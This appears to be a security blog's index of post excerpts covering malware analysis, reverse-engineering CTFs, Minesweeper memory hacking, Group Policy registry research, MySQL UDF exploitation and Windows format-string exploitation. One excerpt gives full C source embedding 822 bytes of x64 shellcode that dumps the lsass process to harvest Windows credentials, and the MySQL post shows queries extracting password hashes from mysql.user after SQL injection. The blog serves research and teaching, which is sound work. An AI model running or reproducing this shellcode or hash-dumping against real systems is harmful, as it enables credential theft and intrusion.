Analyzing an AutoHotKey Malware

I found this malware spreading through the Facebook messenger. Thanks to Rashan Hasaranga for notifying me this in the first place. It was targeting Sri Lankan people on Facebook. It was a compressed “.bz” file which was spreading via the messenger. The name had “video_” and a random number.

After I downloaded the files, I checked the file hashes. I couldn’t find any analysis done before. So, I decided to get to the bottom of this. The malicious files have the extension as “.com” instead of an exe. However, it’s a compiled exe, renaming this to “com” will still run as an exe by the Windows loader.

These are the samples I found. However, they all contain the same malware. I found 2 authors compiled this from 2 different machines. Read along 😊


Shellcode to Dump the Lsass Process

Here’s the shellcode I wrote for curiosity and ended up working nicely 🙂

This shellcode is for Windows 10 and Server 2019 x86_64.

# include <stdio.h>
# include <string.h>
# include <windows.h>
 * Title: Shellcode to dump the lsass process
 * Works only on Windows 10 and Windows Server 2019
 * Arch: x86_64
 * Author: Osanda Malith Jayathissa (@OsandaMalith)
 * Website:    
 * Date: 11/05/2019
int main() {

	unsigned char shellcode[822] = {
		0xE9, 0x1B, 0x03, 0x00, 0x00, 0xCC, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x74,
		0x24, 0x10, 0x57, 0x48, 0x83, 0xEC, 0x10, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00,
		0x8B, 0xF1, 0x48, 0x8B, 0x50, 0x18, 0x4C, 0x8B, 0x4A, 0x10, 0x4D, 0x8B, 0x41, 0x30, 0x4D, 0x85,
		0xC0, 0x0F, 0x84, 0xB8, 0x00, 0x00, 0x00, 0x41, 0x0F, 0x10, 0x41, 0x58, 0x49, 0x63, 0x40, 0x3C,
		0x4D, 0x8B, 0x09, 0x42, 0x8B, 0x9C, 0x00, 0x88, 0x00, 0x00, 0x00, 0x33, 0xD2, 0xF3, 0x0F, 0x7F,
		0x04, 0x24, 0x85, 0xDB, 0x74, 0xD4, 0x48, 0x8B, 0x04, 0x24, 0x48, 0xC1, 0xE8, 0x10, 0x44, 0x0F,
		0xB7, 0xD0, 0x45, 0x85, 0xD2, 0x74, 0x20, 0x48, 0x8B, 0x4C, 0x24, 0x08, 0x45, 0x8B, 0xDA, 0xC1,
		0xCA, 0x0D, 0x80, 0x39, 0x61, 0x0F, 0xBE, 0x01, 0x7C, 0x03, 0x83, 0xC2, 0xE0, 0x03, 0xD0, 0x48,
		0xFF, 0xC1, 0x49, 0xFF, 0xCB, 0x75, 0xE8, 0x4D, 0x8D, 0x14, 0x18, 0x33, 0xC9, 0x41, 0x8B, 0x7A,
		0x20, 0x49, 0x03, 0xF8, 0x41, 0x39, 0x4A, 0x18, 0x76, 0x90, 0x8B, 0x1F, 0x45, 0x33, 0xDB, 0x48,
		0x8D, 0x7F, 0x04, 0x49, 0x03, 0xD8, 0x41, 0xC1, 0xCB, 0x0D, 0x0F, 0xBE, 0x03, 0x48, 0xFF, 0xC3,
		0x44, 0x03, 0xD8, 0x80, 0x7B, 0xFF, 0x00, 0x75, 0xED, 0x41, 0x8D, 0x04, 0x13, 0x3B, 0xC6, 0x74,
		0x0D, 0xFF, 0xC1, 0x41, 0x3B, 0x4A, 0x18, 0x72, 0xD1, 0xE9, 0x5C, 0xFF, 0xFF, 0xFF, 0x41, 0x8B,
		0x42, 0x24, 0x03, 0xC9, 0x49, 0x03, 0xC0, 0x0F, 0xB7, 0x04, 0x01, 0x41, 0x8B, 0x4A, 0x1C, 0xC1,
		0xE0, 0x02, 0x48, 0x98, 0x49, 0x03, 0xC0, 0x8B, 0x04, 0x01, 0x49, 0x03, 0xC0, 0xEB, 0x02, 0x33,
		0xC0, 0x48, 0x8B, 0x5C, 0x24, 0x20, 0x48, 0x8B, 0x74, 0x24, 0x28, 0x48, 0x83, 0xC4, 0x10, 0x5F,
		0xC3, 0xCC, 0xCC, 0xCC, 0x40, 0x55, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41,
		0x57, 0x48, 0x8D, 0xAC, 0x24, 0x28, 0xFF, 0xFF, 0xFF, 0x48, 0x81, 0xEC, 0xD8, 0x01, 0x00, 0x00,
		0x33, 0xC0, 0x48, 0x8D, 0x7D, 0xA0, 0xB9, 0x30, 0x01, 0x00, 0x00, 0xF3, 0xAA, 0x45, 0x33, 0xF6,
		0xB9, 0x4C, 0x77, 0x26, 0x07, 0xC7, 0x45, 0x80, 0x6B, 0x65, 0x72, 0x6E, 0xC7, 0x45, 0x84, 0x65,
		0x6C, 0x33, 0x32, 0xC7, 0x45, 0x88, 0x2E, 0x64, 0x6C, 0x6C, 0x44, 0x88, 0x75, 0x8C, 0xC7, 0x44,
		0x24, 0x70, 0x64, 0x62, 0x67, 0x63, 0xC7, 0x44, 0x24, 0x74, 0x6F, 0x72, 0x65, 0x2E, 0xC7, 0x44,
		0x24, 0x78, 0x64, 0x6C, 0x6C, 0x00, 0xC7, 0x44, 0x24, 0x60, 0x6E, 0x74, 0x64, 0x6C, 0xC7, 0x44,
		0x24, 0x64, 0x6C, 0x2E, 0x64, 0x6C, 0x66, 0xC7, 0x44, 0x24, 0x68, 0x6C, 0x00, 0xC7, 0x44, 0x24,
		0x50, 0x6C, 0x73, 0x61, 0x73, 0xC7, 0x44, 0x24, 0x54, 0x73, 0x2E, 0x64, 0x6D, 0x66, 0xC7, 0x44,
		0x24, 0x58, 0x70, 0x00, 0xC7, 0x44, 0x24, 0x40, 0x6C, 0x73, 0x61, 0x73, 0xC7, 0x44, 0x24, 0x44,
		0x73, 0x2E, 0x65, 0x78, 0x66, 0xC7, 0x44, 0x24, 0x48, 0x65, 0x00, 0xC6, 0x85, 0x20, 0x01, 0x00,
		0x00, 0x61, 0xE8, 0x51, 0xFE, 0xFF, 0xFF, 0x48, 0x8D, 0x4D, 0x80, 0x48, 0x8B, 0xF8, 0xFF, 0xD7,
		0x48, 0x8D, 0x4C, 0x24, 0x70, 0xFF, 0xD7, 0x48, 0x8D, 0x4C, 0x24, 0x60, 0xFF, 0xD7, 0xB9, 0x80,
		0x39, 0x1E, 0x92, 0xE8, 0x30, 0xFE, 0xFF, 0xFF, 0xB9, 0xDA, 0xF6, 0xDA, 0x4F, 0x48, 0x8B, 0xF0,
		0xE8, 0x23, 0xFE, 0xFF, 0xFF, 0xB9, 0x27, 0xA9, 0xE8, 0x67, 0x48, 0x8B, 0xF8, 0xE8, 0x16, 0xFE,
		0xFF, 0xFF, 0xB9, 0x8D, 0x52, 0x01, 0xBD, 0x48, 0x8B, 0xD8, 0xE8, 0x09, 0xFE, 0xFF, 0xFF, 0xB9,
		0x74, 0x71, 0x8D, 0xDC, 0x4C, 0x8B, 0xE0, 0xE8, 0xFC, 0xFD, 0xFF, 0xFF, 0xB9, 0xB4, 0x73, 0x8D,
		0xE2, 0x4C, 0x8B, 0xF8, 0xE8, 0xEF, 0xFD, 0xFF, 0xFF, 0xB9, 0xEE, 0x95, 0xB6, 0x50, 0x4C, 0x8B,
		0xE8, 0xE8, 0xE2, 0xFD, 0xFF, 0xFF, 0xB9, 0x3D, 0xD7, 0xC8, 0x6E, 0x48, 0x89, 0x85, 0x30, 0x01,
		0x00, 0x00, 0xE8, 0xD1, 0xFD, 0xFF, 0xFF, 0xB9, 0x7A, 0x19, 0x77, 0x6A, 0x48, 0x89, 0x45, 0x90,
		0xE8, 0xC3, 0xFD, 0xFF, 0xFF, 0x4C, 0x8D, 0x8D, 0x28, 0x01, 0x00, 0x00, 0x41, 0x8D, 0x4E, 0x14,
		0x45, 0x33, 0xC0, 0xB2, 0x01, 0xFF, 0xD0, 0x4C, 0x21, 0x74, 0x24, 0x30, 0x48, 0x8D, 0x4C, 0x24,
		0x50, 0x45, 0x33, 0xC9, 0x45, 0x33, 0xC0, 0xBA, 0x00, 0x00, 0x00, 0x10, 0xC7, 0x44, 0x24, 0x28,
		0x80, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x20, 0x02, 0x00, 0x00, 0x00, 0xFF, 0xD7, 0x33, 0xD2,
		0x48, 0x89, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8D, 0x4A, 0x02, 0xFF, 0xD6, 0x48, 0x8D, 0x55, 0xA0,
		0xC7, 0x45, 0xA0, 0x30, 0x01, 0x00, 0x00, 0x48, 0x8B, 0xC8, 0x48, 0x8B, 0xF8, 0xFF, 0xD3, 0x33,
		0xDB, 0x85, 0xC0, 0x74, 0x31, 0xEB, 0x1C, 0x48, 0x8D, 0x55, 0xA0, 0x48, 0x8B, 0xCF, 0x41, 0xFF,
		0xD4, 0x48, 0x8D, 0x55, 0xCC, 0x48, 0x8D, 0x8D, 0x20, 0x01, 0x00, 0x00, 0x41, 0xFF, 0xD5, 0x44,
		0x8B, 0x75, 0xA8, 0x48, 0x8D, 0x54, 0x24, 0x40, 0x48, 0x8D, 0x8D, 0x20, 0x01, 0x00, 0x00, 0x41,
		0xFF, 0xD7, 0x85, 0xC0, 0x75, 0xD1, 0x45, 0x8B, 0xC6, 0x33, 0xD2, 0xB9, 0xFF, 0xFF, 0x1F, 0x00,
		0xFF, 0x95, 0x30, 0x01, 0x00, 0x00, 0x4C, 0x8B, 0x85, 0x38, 0x01, 0x00, 0x00, 0x48, 0x89, 0x5C,
		0x24, 0x30, 0x48, 0x8B, 0xC8, 0x41, 0xB9, 0x02, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xD6, 0x48, 0x89,
		0x5C, 0x24, 0x28, 0x48, 0x89, 0x5C, 0x24, 0x20, 0xFF, 0x55, 0x90, 0x48, 0x81, 0xC4, 0xD8, 0x01,
		0x00, 0x00, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5F, 0x5E, 0x5B, 0x5D, 0xC3, 0xCC,
		0x56, 0x48, 0x8B, 0xF4, 0x48, 0x83, 0xE4, 0xF0, 0x48, 0x83, 0xEC, 0x20, 0xE8, 0xD3, 0xFD, 0xFF,
		0xFF, 0x48, 0x8B, 0xE6, 0x5E, 0xC3
    DWORD oldProtect;
    BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
    if (!ret) {
        fprintf(stderr, "%s", "Error Occured");
        return EXIT_FAILURE;
    VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect);
    return EXIT_SUCCESS;


Determining Registry Keys of Group Policy Settings

One night I was curious about how the Group Policy Manager sets the policies using registry keys. The GUI displays detailed descriptions but not the backend registry key the target policy uses.
Of course, if you Google a policy you can end up finding the target registry value or have a look at the “C:\windows\policydefinitions” folder for the admx files. But I wanted to see for myself how this works behind the scenes. So, I used the API Monitor to monitor the APIs and check the values manually.

Let’s have a look at the policy where we can disable the right click.

The process is “mmc.exe”, the Microsoft Management Console. The Local Group Policy Editor – “gpedit.msc” is just one snap-in of it.

Linux Reverse Engineering CTFs for Beginners

After a while, I decided a write a short blog post about Linux binary reversing CTFs in general. How to approach a binary and solving for beginners. I personally am not a fan of Linux reverse engineering challenges in general, since I focus more time on Windows reversing. I like windows reverse engineering challenges more. A reason me liking Windows is as a pentester daily I encounter Windows machines and it’s so rare I come across an entire network running Linux. Even when it comes to exploit development it’s pretty rare you will manually develop an exploit for a Linux software while pentesting. But this knowledge is really useful when it comes to IoT, since almost many devices are based on Linux embedded. If you want to begin reverse engineering and exploit development starting from Linux would be a good idea. I too started from Linux many years ago. Saying that since some people when they see a reverse engineering challenge they try to run away. So if you are a newbie I hope this content might be useful for you to begin with.

The ELF Format

Let’s first have a look at the ELF headers. The best way to learn more about this in detail is to check the man pages for ELF.

Here’s in more detail. The “e_shoff” member holds the offset to the section header table. The “sh_offset” member holds the address to the section’s first byte.

Haxing Minesweeper

Recently I tweeted a screenshot where I won the Minesweeper game by looking at the mine field from the memory. I posted this for no reason, just for fun since I was happy that I finally won this game. I used to play this game back in 2002 in Windows XP and I never won this game, I never even understood how this game works until today when I read how it really works 😀

In few minutes my notifications were flooded, I didn’t expect to get this much of likes. Some people asked me a tutorial on this. I thought of writing a very quick blog post on this. Pardon me if I missed anything.

MySQL UDF Exploitation


In the real world, while I was pentesting a financial institute I came across a scenario where they had an internal intranet and it was using MySQL 5.7 64-bit as the backend database technology. Most of the time the I encounter MSSQL in most cooperate environments, but this was a rare case. I found SQL injection in the web application and I was able to dump the username and password from the mysql.user and I realized it had privileges to write files to disk. This lead me into writing a post and sharing techniques in injecting a UDF library to MySQL and gaining code execution and popping a shell in Windows. When I Googled most techniques are a bit vague when it comes to Windows. So, I thought of writing this post with my own research to clear things and make you understand few tricks you can use to do this manually.

I will be hosting the latest MySQL 5.7.21 latest community server by the time I am blogging this, in one machine. To reproduce the scenario, I am running the mysqld server with ‘–secure-file-priv=’ parameter set to blank. In this scenario I was able to retrieve the username and password from the mysql.user table using a union based injection in the intranet. Note that in MySQL 5.7 and above the column ‘password’ doesn’t exists. They have changed it to ‘authentication_string’.

# MySQL 5.6 and below
select host, user, password from mysql.user;
# MySQL 5.7 and above
select host, user, authentication_string from mysql.user;

Note that you can use the metasploit’s mysql_hashdump.rb auxiliary module to dump the MySQL hashes if you already have the credentials. By the time I am writing this blog post the script needed to be updated to extract in MySQL 5.7 you can check my pull request here

The host column for the user ‘osanda’ allows connections from 192.168.0.*, which means we can use this user for remote connections from that IP range. I cracked password hash and got the plain text password.

Exploiting Format Strings in Windows

I thought of making a small challenge in exploiting format strings in Windows. This is how it looks, it asks for a filename to open. At first this might be a bit confusing. There’s no vulnerable functions in reading a file. You can see that our first argument to the program is echoed back in the program.

Let’s investigate this inside a debugger. As you can see if argc == 2 the application continues the flow and argv[1] is passed into that function highlighted.